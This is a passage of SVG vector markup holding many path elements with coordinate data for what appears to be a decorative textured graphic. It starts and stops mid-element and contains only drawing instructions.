0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path 